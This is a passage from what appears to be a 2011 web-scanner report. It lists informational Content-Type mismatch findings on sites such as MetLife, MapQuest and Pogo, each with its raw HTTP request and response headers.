GET /extern/login_status.php?api_key=155079171186702&app_id=155079171186702&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df143a1bc3%26origin%3Dhttp%253A%252F%252Fphuket.com%252Ff200239f1%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_GB&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df12abf4cdc%26origin%3Dhttp%253A%252F%252Fphuket.com%252Ff200239f1%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df12b30ed1c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2d7959e18%26origin%3Dhttp%253A%252F%252Fphuket.com%252Ff200239f1%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df12b30ed1c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df25479d134%26origin%3Dhttp%253A%252F%252Fphuket.com%252Ff200239f1%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df12b30ed1c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1bfa62428%26origin%3Dhttp%253A%252F%252Fphuket.com%252Ff200239f1%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df12b30ed1c&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://phuket.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en_US; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; lsd=Jr-eQ; datr=3GHNTeTln1shCRlV4nyEfKsc; reg_ext_ref=http%3A%2F%2Fwww.addthis.com%2Fbookmark.php%3Fv%3D250%26winname%3Daddthis%26pub%3Dasepyanm%26source%3Dtbx-250%2Cmen-250%26lng%3Den%26s%3Dfacebook%26url%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Fproduk-layanan%252F%26title%3DProduk%2520dan%2520Layanan%26ate%3DAT-asepyanm%2F-%2F-%2F4e048e8a01452adb%2F4%2F4dce8a530508b02d%26frommenu%3D1%26uid%3D4dce8a530508b02d%26ct%3D1%26pre%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Finfo-perusahaan%252F%26tt%3D0; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; wd=1057x822

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.9.59
X-Cnection: close
Date: Fri, 24 Jun 2011 13:20:38 GMT
Content-Length: 60

Given URL is not permitted by the application configuration.
29.46. http://www.gamersdailynews.com/images/nextgen_green/header_split.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.gamersdailynews.com
Path:   /images/nextgen_green/header_split.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/nextgen_green/header_split.jpg HTTP/1.1
Host: www.gamersdailynews.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: phpbb3_drqak_u=1; phpbb3_drqak_k=; phpbb3_drqak_sid=8bc5b9544f80f0ba5ecbaf89ec71c4c6; __switchTo5x=21; __unam=383617f-130c1d4b0b1-2c952677-1

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:26:48 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Last-Modified: Thu, 08 Jan 2009 05:00:00 GMT
ETag: "5080ad-4b2-45ff18336b400"
Accept-Ranges: bytes
Content-Length: 1202
Content-Type: image/jpeg

GIF89a..................................................................................................................................................................................................
...[SNIP]...
29.47. http://www.gamersdailynews.com/images/nextgen_green/rate.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.gamersdailynews.com
Path:   /images/nextgen_green/rate.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/nextgen_green/rate.jpg HTTP/1.1
Host: www.gamersdailynews.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: phpbb3_drqak_u=1; phpbb3_drqak_k=; phpbb3_drqak_sid=8bc5b9544f80f0ba5ecbaf89ec71c4c6; __switchTo5x=21; __unam=383617f-130c1d4b0b1-2c952677-1; __utmz=113500945.1308922001.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113500945.1055506945.1308922001.1308922001.1308922001.1; __utmc=113500945; __utmb=113500945.1.10.1308922001; MAXID=fa0cb0dd8401d4dd8675f9f0abbbd18f

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:27:03 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Last-Modified: Fri, 09 Jan 2009 05:00:00 GMT
ETag: "5080e9-60a-46005a10e1400"
Accept-Ranges: bytes
Content-Length: 1546
Content-Type: image/jpeg

GIF89a,...........j...ZZY..........................O..:.................k....................j...................................................................................k......................
...[SNIP]...
29.48. http://www.mapquest.com/cdn/dotcom3/images/new_purple_button.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.mapquest.com
Path:   /cdn/dotcom3/images/new_purple_button.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /cdn/dotcom3/images/new_purple_button.jpg HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="PuS5h/EipDX1lQ3yENE105ZQuwQ="; tsexpiry=1; psession="htZQI27rp9upP5M1sdqhuRpH5n4="; c_Id=MjQyOjQwNA%3D%3D; s_pers=%20s_getnr%3D1308924922785-New%7C1371996922785%3B%20s_nrgvo%3DNew%7C1371996922786%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: c_Id=MjQyOjQwNA%3D%3D; Expires=Fri, 24-Jun-2011 14:45:23 GMT; Path=/
Accept-Ranges: bytes
ETag: W/"660-1308839292000"
Last-Modified: Thu, 23 Jun 2011 14:28:12 GMT
Content-Type: image/jpeg
Content-Length: 660
Date: Fri, 24 Jun 2011 14:15:23 GMT

.PNG
.
...IHDR...,.........J3......tEXtSoftware.Adobe ImageReadyq.e<...6IDATx.b...?.P..C..,+'..Z.& ...~Pz .w >..w.q.1.o.b.A...@\.b0.P ....cA...=p9..7... K.8...M...as.=....RB....13...r..BbB...\..y
...[SNIP]...
29.49. http://www.metlife.com/assets/campaigns/search/termlife/hp/form-tile.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.metlife.com
Path:   /assets/campaigns/search/termlife/hp/form-tile.png

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a PNG image.

Request

GET /assets/campaigns/search/termlife/hp/form-tile.png HTTP/1.1
Host: www.metlife.com
Proxy-Connection: keep-alive
Referer: http://www.metlife.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=MQPOMIS172.24.35.24CKMKW; MetTempReq=true; JSESSIONID=0000FdCQHasM3ki7wW07duQyhD-:13j4u5d0o; MetlifeSU=0; siscweb=XUPOLRS172.24.35.19CKMQQ

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:00:33 GMT
Server: IBM_HTTP_Server
Last-Modified: Sun, 17 Apr 2011 17:03:22 GMT
Content-Type: text/plain
Content-Language: en-US
Vary: Accept-Encoding
Content-Length: 198

.PNG
.
...IHDR...K.........W.. ....tEXtSoftware.Adobe ImageReadyq.e<...hIDATx.b|......
..Ff.fbf`dd....bL.....!....l.(...%>
F.(..d.Fb%......A.?...D.E........ ...O:@......    .t.....    #..K......IEND.B`.
29.50. http://www.metlife.com/assets/ib/insurance/disability/individual-disability-calc.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.metlife.com
Path:   /assets/ib/insurance/disability/individual-disability-calc.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /assets/ib/insurance/disability/individual-disability-calc.jpg HTTP/1.1
Host: www.metlife.com
Proxy-Connection: keep-alive
Referer: http://www.metlife.com/individual/insurance/disability-insurance/index.html?WT.ac=GN_individual_insurance_disability-insurance
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=MQPOMIS172.24.35.24CKMKW; JSESSIONID=0000FdCQHasM3ki7wW07duQyhD-:13j4u5d0o; siscweb=XUPOLRS172.24.35.19CKMQQ; __utmz=50475317.1308935069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op314iqtcreativetermfieldgum=a06c0gd0rg276oi0su0tqb515; op314iqtcreativetermfieldliid=a06c0gd0rg276oi0su0tqb515; WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1308935117304:ss=1308935068484; __utma=50475317.2023485494.1308935069.1308935069.1308935069.1; __utmc=50475317; __utmb=50475317.6.9.1308935113663; MetlifeSU=0

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:01:32 GMT
Server: IBM_HTTP_Server
Last-Modified: Wed, 01 Jun 2011 18:10:17 GMT
Content-Type: image/jpeg
Content-Language: en-US
Cache-Control: max-age=1800
Expires: Fri, 24 Jun 2011 17:31:32 GMT
Vary: Accept-Encoding
Content-Length: 20139

GIF89a.........^_a.N......R...R5............
7......*(.q.mG.....p.s....J....................-...$......<............$......:'..V
.z+..s.J......mj......c........|..._..........wC......MC'..e..%.wUgV+.
...[SNIP]...
29.51. http://www.metlife.com/assets/ib/insurance/disability/quiz-banner.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.metlife.com
Path:   /assets/ib/insurance/disability/quiz-banner.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /assets/ib/insurance/disability/quiz-banner.jpg HTTP/1.1
Host: www.metlife.com
Proxy-Connection: keep-alive
Referer: http://www.metlife.com/individual/insurance/disability-insurance/index.html?WT.ac=GN_individual_insurance_disability-insurance
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=MQPOMIS172.24.35.24CKMKW; JSESSIONID=0000FdCQHasM3ki7wW07duQyhD-:13j4u5d0o; siscweb=XUPOLRS172.24.35.19CKMQQ; __utmz=50475317.1308935069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op314iqtcreativetermfieldgum=a06c0gd0rg276oi0su0tqb515; op314iqtcreativetermfieldliid=a06c0gd0rg276oi0su0tqb515; WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1308935117304:ss=1308935068484; __utma=50475317.2023485494.1308935069.1308935069.1308935069.1; __utmc=50475317; __utmb=50475317.6.9.1308935113663; MetlifeSU=0

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:01:32 GMT
Server: IBM_HTTP_Server
Last-Modified: Sun, 17 Apr 2011 22:48:39 GMT
Content-Type: image/jpeg
Content-Language: en-US
Cache-Control: max-age=1800
Expires: Fri, 24 Jun 2011 17:31:32 GMT
Vary: Accept-Encoding
Content-Length: 3432

GIF87a..Q....l:w....r.....o......"vG.......................T..p..a..|.........3....{...w.....U...........D..fm<x.v..G[m;x...o?z..K...f.zM.......q@{.w    .t.n=y....q...4rB|.U.}Q....|P.o>z.u..IW.r..n.uF.
...[SNIP]...
29.52. http://www.metlife.com/system/assets/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.metlife.com
Path:   /system/assets/favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /system/assets/favicon.ico HTTP/1.1
Host: www.metlife.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=MQPOMIS172.24.35.24CKMKW; JSESSIONID=0000FdCQHasM3ki7wW07duQyhD-:13j4u5d0o; MetlifeSU=0; siscweb=XUPOLRS172.24.35.19CKMQQ; WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1308935068484:ss=1308935068484; __utmz=50475317.1308935069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=50475317.2023485494.1308935069.1308935069.1308935069.1; __utmc=50475317; __utmb=50475317.1.10.1308935069

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:00:43 GMT
Server: IBM_HTTP_Server
Last-Modified: Fri, 24 Jun 2011 16:25:56 GMT
Content-Type: text/plain
Content-Language: en-US
Vary: Accept-Encoding
Content-Length: 1150

............ .h.......(....... ..... .............................................................................................||~pWVX.;:=.NNP....a............{{|.............qqr....W......._sru.65
...[SNIP]...
29.53. http://www.metlife.com/system/css/RRvalidation.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.metlife.com
Path:   /system/css/RRvalidation.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a BMP image.

Request

GET /system/css/RRvalidation.gif HTTP/1.1
Host: www.metlife.com
Proxy-Connection: keep-alive
Referer: http://www.metlife.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=MQPOMIS172.24.35.24CKMKW; MetTempReq=true; JSESSIONID=0000FdCQHasM3ki7wW07duQyhD-:13j4u5d0o; MetlifeSU=0; siscweb=XUPOLRS172.24.35.19CKMQQ

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:00:32 GMT
Server: IBM_HTTP_Server
Last-Modified: Fri, 11 Feb 2011 03:29:14 GMT
ETag: "403b-47e-4d5dd680"
Accept-Ranges: bytes
Cache-Control: max-age=1800
Expires: Fri, 24 Jun 2011 17:30:32 GMT
Vary: Accept-Encoding
Content-Length: 1150
Content-Type: image/gif

BM~.......6...(.......    ...........H...........................33..DD......ww..............""..........UU................................................................................................
...[SNIP]...
29.54. http://www.metlife.com/wps/proxy/MCPremiumQuoteWS/MCHealthClassOption  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.metlife.com
Path:   /wps/proxy/MCPremiumQuoteWS/MCHealthClassOption

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /wps/proxy/MCPremiumQuoteWS/MCHealthClassOption? HTTP/1.1
Host: www.metlife.com
Proxy-Connection: keep-alive
Referer: http://www.metlife.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=MQPOMIS172.24.35.24CKMKW; JSESSIONID=0000FdCQHasM3ki7wW07duQyhD-:13j4u5d0o; MetlifeSU=0; siscweb=XUPOLRS172.24.35.19CKMQQ; WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1308935068484:ss=1308935068484; __utmz=50475317.1308935069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=50475317.2023485494.1308935069.1308935069.1308935069.1; __utmc=50475317; __utmb=50475317.1.10.1308935069

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:00:40 GMT
Server: IBM_HTTP_Server
Vary: Accept-Encoding
Content-Type: text/html
Content-Language: en-US
Content-Length: 123

<textarea>{"statuscode":"0","statusmsg":"Successful","healthoptions":"E:Excellent;VG:Very Good;G:Good ;F:Fair;"}</textarea>
29.55. http://www.metlife.com/wps/proxy/MCPremiumQuoteWS/MCPremiumQuote  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.metlife.com
Path:   /wps/proxy/MCPremiumQuoteWS/MCPremiumQuote

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /wps/proxy/MCPremiumQuoteWS/MCPremiumQuote?term=20&age=51&gender=M&health=E&tobacco=Yes&coverage=300000&state=AL&lstPnPParameters=state%2CDOB%2Ccoverage%2Cterm%2Ctobacco%2Chealth%2Cgender%2ClStatus&lStatus=Q&rating=0 HTTP/1.1
Host: www.metlife.com
Proxy-Connection: keep-alive
Referer: http://www.metlife.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=MQPOMIS172.24.35.24CKMKW; JSESSIONID=0000FdCQHasM3ki7wW07duQyhD-:13j4u5d0o; MetlifeSU=0; siscweb=XUPOLRS172.24.35.19CKMQQ; __utmz=50475317.1308935069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1308935083487:ss=1308935068484; __utma=50475317.2023485494.1308935069.1308935069.1308935069.1; __utmc=50475317; __utmb=50475317.3.9.1308935083499

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:01:16 GMT
Server: IBM_HTTP_Server
Vary: Accept-Encoding
Content-Type: text/html
Content-Language: en-US
Content-Length: 83

<textarea>{"statuscode":"0","statusmsg":"Successful","premium":"225.72"}</textarea>
29.56. http://www.parallels.com/r/css/import.css  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.parallels.com
Path:   /r/css/import.css

Issue detail

The response contains the following Content-type statement:The response states that it contains CSS. However, it actually appears to contain plain text.

Request

GET /r/css/import.css?20100718 HTTP/1.1
Host: www.parallels.com
Proxy-Connection: keep-alive
Referer: http://www.parallels.com/store/plesk/win/addons/?store_id=1&version=10.0.0&os=windows&key=SMB015741170000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1306243398.5.3.utmcsr=webmail.nosedivesailing.com|utmccn=(referral)|utmcmd=referral|utmcct=/services/portal/sidebar.php; __utma=1.1253792871.1305655713.1306182369.1306243398.5; s_vnum=1337191716908%26vn%3D5; aspcms_sid=48a903a1636cde6068ae966d18fa4efd; region=en|

Response

HTTP/1.0 200 OK
Date: Fri, 24 Jun 2011 16:32:26 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 19 May 2011 08:26:14 GMT
ETag: "7be801b-ac-c220d580"
Accept-Ranges: bytes
Content-Length: 172
Expires: Sat, 25 Jun 2011 16:32:26 GMT
Content-Type: text/css
Age: 34705
X-Cache: HIT from www.parallels.com
X-Cache-Lookup: HIT from www.parallels.com:80
Connection: keep-alive

@charset "UTF-8";
@import url("/r/css/general.css");
@import url("/r/css/content/main.css");
@import url("/r/css/modules/forms.css");
@import url("/files/css/buttons.css");
29.57. http://www.phuket-travel.com/reserve/indexShort.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.phuket-travel.com
Path:   /reserve/indexShort.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /reserve/indexShort.php?action=dest&dest=75&deF=0&lang=en HTTP/1.1
Host: www.phuket-travel.com
Proxy-Connection: keep-alive
Referer: http://www.phuket-travel.com/premium-packages/index.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=221167833.1308921744.1.1.utmcsr=phuket.com|utmccn=(referral)|utmcmd=referral|utmcct=/islands/index.htm; JSESSIONID=48D389D0F243F4CD82ACA4D8422C50D0; s_cc=true; s_evar38=AWDINP1356; __utma=221167833.643271157.1308921743.1308921743.1308921743.1; __utmc=221167833; __utmb=221167833.2.10.1308921743; s_sq=wotifcom-awd-global-prd%3D%2526pid%253Dphuket-travel.com%25253Atours%25253Athailand%25253Aphuket%25253Aphuket%252520tours%252520%252526%252520travel%2526pidt%253D1%2526oid%253Dhttp%25253A//www.phuket-travel.com/premium-packages/index.htm%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:29:23 GMT
Server: Apache/2.2.17
Cache-Control: max-age=0
Expires: Fri, 24 Jun 2011 13:29:23 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 577
Content-Type: text/html

var aaRrDeSt = new Array("All Destinations", "Ao Por", "Bang Tao", "Chalong", "Kamala Beach", "Karon Beach", "Kata Beach", "Koh Yao", "Mai Khao", "Nai Harn", "Nai Thon", "Nai Yang", "Nearby Island", "
...[SNIP]...
29.58. http://www.phuket-travel.com/scripts/scripts.htm  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.phuket-travel.com
Path:   /scripts/scripts.htm

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /scripts/scripts.htm HTTP/1.1
Host: www.phuket-travel.com
Proxy-Connection: keep-alive
Referer: http://www.phuket-travel.com/premium-packages/index.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=221167833.1308921744.1.1.utmcsr=phuket.com|utmccn=(referral)|utmcmd=referral|utmcct=/islands/index.htm; JSESSIONID=48D389D0F243F4CD82ACA4D8422C50D0; s_cc=true; s_evar38=AWDINP1356; __utma=221167833.643271157.1308921743.1308921743.1308921743.1; __utmc=221167833; __utmb=221167833.2.10.1308921743; s_sq=wotifcom-awd-global-prd%3D%2526pid%253Dphuket-travel.com%25253Atours%25253Athailand%25253Aphuket%25253Aphuket%252520tours%252520%252526%252520travel%2526pidt%253D1%2526oid%253Dhttp%25253A//www.phuket-travel.com/premium-packages/index.htm%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:22:44 GMT
Server: Apache/2.2.17
Last-Modified: Fri, 24 Jun 2011 01:18:46 GMT
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Fri, 24 Jun 2011 13:22:44 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 89532
Content-Type: text/html


<!--[if lte IE 6]><script language="JavaScript" src="/scripts/ie6menu.js"><script language="JavaScript" src="/scripts/ie6hidelogo.js"></script><script type="text/javascript" src="/scripts/pngfix.js">
...[SNIP]...
29.59. http://www.pogo.com/include/css/pogo.css  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.pogo.com
Path:   /include/css/pogo.css

Issue detail

The response contains the following Content-type statement:The response states that it contains CSS. However, it actually appears to contain HTML.

Request

GET /include/css/pogo.css HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP0001&ad=6429295350&kw=free+internet+games&sitetarget=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=3E01A5E24CD32774E6EF83CEAF1EADF3.000099; com.pogo.unid=6618690632146297

Response

HTTP/1.1 200 OK
Age: 5183
Date: Fri, 24 Jun 2011 12:15:43 GMT
Content-Length: 4640
Connection: Keep-Alive
Via: POGO-EDGE
ETag: W/"4640-1294693595000"
Last-Modified: Mon, 10 Jan 2011 21:06:35 GMT
Content-Type: text/css
Vary: Accept-Encoding
Server: Apache-Coyote/1.1

<style TYPE="text/css">
<!--
.aa {font-family:Arial, Helvetica, sans-serif}
img {border-width:0}

.default {font-family: Arial, Helvetica, sans-serif; font-size: 12px; color: #000000}
.dflt {font-fami
...[SNIP]...
29.60. http://www.pymnts.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.pymnts.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.pymnts.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=62c3304e75d2fes56pl1nc2dv1; __utmz=51642920.1308921997.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=51642920.1562186053.1308921997.1308921997.1308921997.1; __utmc=51642920; __utmb=51642920.1.10.1308921997

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:38 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sun, 03 Apr 2011 04:13:36 GMT
ETag: "d88c2-57e-49ffbddf0dc00"
Accept-Ranges: bytes
Content-Length: 1406
Cache-Control: max-age=900
Expires: Fri, 24 Jun 2011 13:45:38 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ...................................o.s.............e.i.....................g.l.............r.v.....c.g.k.o.............x.|.s.w.....`.e.................{..u.z...........
...[SNIP]...
